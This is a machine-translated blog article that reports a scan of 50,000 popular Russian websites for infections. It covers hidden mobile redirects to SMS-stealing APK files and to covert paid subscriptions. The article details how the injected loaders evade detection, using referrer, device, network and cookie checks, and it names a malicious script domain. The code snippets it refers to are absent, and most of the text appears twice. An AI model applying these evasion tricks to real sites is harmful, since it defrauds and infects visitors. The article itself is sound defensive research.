Are the "top" sites safe: exploring Alexa ranking
If you look at the Alexa Top-1000 sites in the .ru zone, then in the first three hundred there will be Yandex, Google, Mail.ru and other major projects and companies, and then mainly entertainment, game resources, torrents and profile Media (and sometimes there will be domains of teaser partner networks).
For sites that are not the most top positions of the first thousand, attendance is about 10,000 - 80,000 unique hosts per day, and sometimes higher. For hackers, such resources are attractive because, on the one hand, websites have a high attendance rate, and on the other hand, a low level of protection (usually no one at all), since the owners of such sites often do not pay enough attention to security issues (they don’t know, they don’t know how do not want). For example, a resource with attendance of 85,000 unique hosts per day can work on Wordpress with vulnerable versions of plug-ins. It turns out that the ratio of the cost of hacking to the "profit" from it for this category of sites as much as possible, and this is a tidbit that at least one attacker can use. In theory, everything seems to be logical, but I would like to see this in practice, so I decided to scan a large array of top resources (for example, the first 50,000 Alexa sites in the .ru zone) for hacking / infection, redirects and other security problems. What came out of it is in the article below.
To save readers time, I’ll immediately give the results: about 2% of the sites (to be exact, 971 sites) were “sick”. Among the problems was a complete set: redirects to download infected apk and exe files, hidden mobile redirects to wap-click affiliate programs, phishing, and even two defaces. Despite the fact that the percentage of problem sites seems to be small, the danger turned out to be significant, since hidden redirects showed up on popular sites with an attendance of 60K hosts per day.
')
For more effective detection of malicious code, I used several infection indicators, since malware is not always possible to be determined only by signatures or only by using behavioral analysis. For the analysis, the following were taken into account:
To minimize the number of false positives, white lists of domains and URL fragments were used. For example, redirects were not taken into account when clicking from banners and banner plug-ins, redirects to mobile versions of sites, etc. When checking each site, a series of requests were sent to the start page, navigation was made to the linked pages, on which certain actions were performed, as if the site had real visitors with various parameters (browser, referrer, platform, etc.). After that, the result for all pages was combined and a general report was formed. And so for each of the 50,000 verifiable resources. The standard phantomjs for such a task did not fit due to restrictions on some readonly DOM objects that I had to override, so I had to properly finish them together with WebKit.
An analysis of a large array of sites revealed some common infection patterns and typical ways of introducing malware into script and page code (for example, frequent use of a link shortening service, like goo.gl, vk.cc to hide the address of scripts, add code to the beginning or end of jquery *. js files, a family of unscrupulous teaser / advertising partner networks, etc.).
Details show on a couple of examples. The first will be a resource located on the 750 position ranking ru sites Alexa. This is a fairly popular torrent. It has a naturally high attendance - just over 60,000 unique visitors per day (according to the liveinternet counter).
Let's try to open the site from the mobile: we enter the address of the site in the Google search bar, go to the subsection and click on the download button in the text of the page. Instead of downloading a .torrent file, we are starting to redirect to third-party sites, and as a result we are offered to download and install an .apk file called download.apk.
In order to quickly check the file for “malwares”, we upload it to Virustotal and get the quite expected result - SMS.Agent (i.e. sms spy):
If you repeat the experiment a few more times, then sometimes you are prompted to download a download accelerator, which, as you may have guessed, speeds up the interception of your SMS:
In order for the malicious code to be discovered as late as possible, the hacker tries his best to disguise it: he injects the code dynamically and uses a multi-step test in runtime. For this reason, it is extremely difficult to catch a redirect, without knowing all the nuances, with automated scanners. In this case, the redirect had the following properties:
Below is the code snippet that the loader implemented:
If at least one of the listed conditions is not met, then no redirection will occur. Despite the complex condition of the occurrence of a redirect, the scanner managed to calculate the malware by its characteristic signature and script injection from a suspicious domain:
You can roughly estimate the "scale of the disaster" for this site. When hacking and infecting a resource with a traffic of about 50-60K, an average of about 400-500 visitors come from mobile devices. On a vskid, hundreds of visitors can download an infected .apk file.
Consider another "top" example from the list of infected. This time it is a fitness portal, which occupies approximately 450 places (that is, even more visited). This "patient" alternately threw on the paid subscription service, then on the software that offers acceleration android.
At the next redirect, for the sake of curiosity, I clicked the “Continue browsing” button and then magic happened: I was automatically subscribed to paid content, which was immediately notified by SMS. No questions or confirmation that I want to do this, no additional gestures were required.
Checked in the list of connected services in the personal account of MTS - there really appeared a paid subscription for 20 rubles. Unsubscribed.
What is interesting, at the time of generating the page with the “continue browsing” button, the script already knows your phone number, because the SMS subscription is done with the “blessing” of the mobile operator itself, which provides the necessary interface and information about the subscriber.
So the subscription process can not be automated. And if you do not follow the SMS notifications, you can get a few dozen rubles a day simply by visiting various portals (this is without considering clickjacking, where you unknowingly click on the right place and approve the subscription or download of the malware).
The implementation mechanics on this site are simpler: a hacker added the following fragment to one of the javascript files:
This code downloaded the script from the yadro24.ru domain, and that, in turn, redirected users to the wap-click portal, provided that the visitor was connected via 3G / LTE Internet (using the javascript code, you can see what redirects are possible).
If the mobile site visitor came through WI-FI, no redirects to the wap-click affiliate program occurred. This, by the way, is a big problem for determining wap-click redirects with online services, since all requests need to be sent via 3G / LTE to certain cellular operators.
Similar infection variants were found on other sites from the Alexa Top. Sometimes they embed code at the beginning of scripts, sometimes at the end.
The considered examples are an obvious target hacking of sites and introduction of code by hackers. But among the tested sites, there was often another option: voluntary placement of a widget with hidden redirects or a teaser partner network that redirects mobile users to dangerous sites or a wap-click affiliate program. At the same time, site owners are either not aware of what is happening, or, in pursuit of high earnings, turn a blind eye to this.
Summary statistics for various categories of infection was as follows:
A curious fact: most of the resources that make up the “problem” list (those that download malicious files or redirect visitors to dangerous sites and wap-click affiliate programs) are not marked in Yandex / Google Safe Browsing as “malware” or even “unwanted” . Whether search engines do not have time to check them, or does not detect them, although the latter is unlikely. True, some sites are still removed from the search results of the mobile search.
Well, and finally, I would like to advise two things:
It should be noted that some resources at the time of writing this article have already coped with the infection and currently do not pose a threat, but there remains a sufficiently large portion of the sites visited, which even after 10 days did not change the situation:
For sites that are not the most top positions of the first thousand, attendance is about 10,000 - 80,000 unique hosts per day, and sometimes higher. For hackers, such resources are attractive because, on the one hand, websites have a high attendance rate, and on the other hand, a low level of protection (usually no one at all), since the owners of such sites often do not pay enough attention to security issues (they don’t know, they don’t know how do not want). For example, a resource with attendance of 85,000 unique hosts per day can work on Wordpress with vulnerable versions of plug-ins. It turns out that the ratio of the cost of hacking to the "profit" from it for this category of sites as much as possible, and this is a tidbit that at least one attacker can use. In theory, everything seems to be logical, but I would like to see this in practice, so I decided to scan a large array of top resources (for example, the first 50,000 Alexa sites in the .ru zone) for hacking / infection, redirects and other security problems. What came out of it is in the article below.
To save readers time, I’ll immediately give the results: about 2% of the sites (to be exact, 971 sites) were “sick”. Among the problems was a complete set: redirects to download infected apk and exe files, hidden mobile redirects to wap-click affiliate programs, phishing, and even two defaces. Despite the fact that the percentage of problem sites seems to be small, the danger turned out to be significant, since hidden redirects showed up on popular sites with an attendance of 60K hosts per day.
')
For more effective detection of malicious code, I used several infection indicators, since malware is not always possible to be determined only by signatures or only by using behavioral analysis. For the analysis, the following were taken into account:
- redirects when opening pages with various parameters User Agent + Referer,
- malicious script signatures (regular expressions),
- the presence of a domain or URL fragment in dangerous, suspicious or malicious databases,
- availability of the site in the “black lists” of search engines (safe browsing) and anti-virus services (based on virus total)
To minimize the number of false positives, white lists of domains and URL fragments were used. For example, redirects were not taken into account when clicking from banners and banner plug-ins, redirects to mobile versions of sites, etc. When checking each site, a series of requests were sent to the start page, navigation was made to the linked pages, on which certain actions were performed, as if the site had real visitors with various parameters (browser, referrer, platform, etc.). After that, the result for all pages was combined and a general report was formed. And so for each of the 50,000 verifiable resources. The standard phantomjs for such a task did not fit due to restrictions on some readonly DOM objects that I had to override, so I had to properly finish them together with WebKit.
An analysis of a large array of sites revealed some common infection patterns and typical ways of introducing malware into script and page code (for example, frequent use of a link shortening service, like goo.gl, vk.cc to hide the address of scripts, add code to the beginning or end of jquery *. js files, a family of unscrupulous teaser / advertising partner networks, etc.).
Details show on a couple of examples. The first will be a resource located on the 750 position ranking ru sites Alexa. This is a fairly popular torrent. It has a naturally high attendance - just over 60,000 unique visitors per day (according to the liveinternet counter).
Let's try to open the site from the mobile: we enter the address of the site in the Google search bar, go to the subsection and click on the download button in the text of the page. Instead of downloading a .torrent file, we are starting to redirect to third-party sites, and as a result we are offered to download and install an .apk file called download.apk.
In order to quickly check the file for “malwares”, we upload it to Virustotal and get the quite expected result - SMS.Agent (i.e. sms spy):
If you repeat the experiment a few more times, then sometimes you are prompted to download a download accelerator, which, as you may have guessed, speeds up the interception of your SMS:
In order for the malicious code to be discovered as late as possible, the hacker tries his best to disguise it: he injects the code dynamically and uses a multi-step test in runtime. For this reason, it is extremely difficult to catch a redirect, without knowing all the nuances, with automated scanners. In this case, the redirect had the following properties:
- the malicious injection was in the scrolltop.js script.
- the code worked on the visitor 1 time in 4.5 months (cookies were set)
- The code was introduced dynamically only if the visitor came from a search engine.
- the redirect itself worked only when clicking on certain links
- the .apk download started if the visitor came from the android device (checked in the redirection chain to a malicious resource)
Below is the code snippet that the loader implemented:
If at least one of the listed conditions is not met, then no redirection will occur. Despite the complex condition of the occurrence of a redirect, the scanner managed to calculate the malware by its characteristic signature and script injection from a suspicious domain:
You can roughly estimate the "scale of the disaster" for this site. When hacking and infecting a resource with a traffic of about 50-60K, an average of about 400-500 visitors come from mobile devices. On a vskid, hundreds of visitors can download an infected .apk file.
Consider another "top" example from the list of infected. This time it is a fitness portal, which occupies approximately 450 places (that is, even more visited). This "patient" alternately threw on the paid subscription service, then on the software that offers acceleration android.
At the next redirect, for the sake of curiosity, I clicked the “Continue browsing” button and then magic happened: I was automatically subscribed to paid content, which was immediately notified by SMS. No questions or confirmation that I want to do this, no additional gestures were required.
Checked in the list of connected services in the personal account of MTS - there really appeared a paid subscription for 20 rubles. Unsubscribed.
What is interesting, at the time of generating the page with the “continue browsing” button, the script already knows your phone number, because the SMS subscription is done with the “blessing” of the mobile operator itself, which provides the necessary interface and information about the subscriber.
So the subscription process can not be automated. And if you do not follow the SMS notifications, you can get a few dozen rubles a day simply by visiting various portals (this is without considering clickjacking, where you unknowingly click on the right place and approve the subscription or download of the malware).
The implementation mechanics on this site are simpler: a hacker added the following fragment to one of the javascript files:
This code downloaded the script from the yadro24.ru domain, and that, in turn, redirected users to the wap-click portal, provided that the visitor was connected via 3G / LTE Internet (using the javascript code, you can see what redirects are possible).
If the mobile site visitor came through WI-FI, no redirects to the wap-click affiliate program occurred. This, by the way, is a big problem for determining wap-click redirects with online services, since all requests need to be sent via 3G / LTE to certain cellular operators.
Similar infection variants were found on other sites from the Alexa Top. Sometimes they embed code at the beginning of scripts, sometimes at the end.
The considered examples are an obvious target hacking of sites and introduction of code by hackers. But among the tested sites, there was often another option: voluntary placement of a widget with hidden redirects or a teaser partner network that redirects mobile users to dangerous sites or a wap-click affiliate program. At the same time, site owners are either not aware of what is happening, or, in pursuit of high earnings, turn a blind eye to this.
Summary statistics for various categories of infection was as follows:
A curious fact: most of the resources that make up the “problem” list (those that download malicious files or redirect visitors to dangerous sites and wap-click affiliate programs) are not marked in Yandex / Google Safe Browsing as “malware” or even “unwanted” . Whether search engines do not have time to check them, or does not detect them, although the latter is unlikely. True, some sites are still removed from the search results of the mobile search.
Well, and finally, I would like to advise two things:
- If you are a visitor to these popular resources - do not hope that all of them are safe. Even if you have an antivirus installed, it will not save you from such problems as wap-click redirects to SMS subscriptions, because it is not a virus (you are simply imperceptibly subscribed to a paid service and removed every day for 20 rubles) And, frankly, Antiviruses protect from drive-by attacks far from 100% of cases, especially on Android. Therefore, it is good practice to independently check such sites with specialized services if any suspicion arises.
- If you are the owner of such resources and have not yet thought about the security of the site, or it seems to you that you are not hacked - it's time to do a full site diagnostics: scan the files on the hosting for hacker web shells, backdoors (there are AI-BOLIT utilities for this, ClamAv, Maldet), it is even possible to do a Pentest project, and also check available security problems with services (for example, using rescan.pro, quttera.com, sitecheck.sucuri.net). And also, do not be lazy to go from the search results to your site from a mobile device via a 3G / LTE connection, selectively click the links of the site, look at the code, check for any anomalies.
It should be noted that some resources at the time of writing this article have already coped with the infection and currently do not pose a threat, but there remains a sufficiently large portion of the sites visited, which even after 10 days did not change the situation:
Source: https://habr.com/ru/post/301816/
All Articles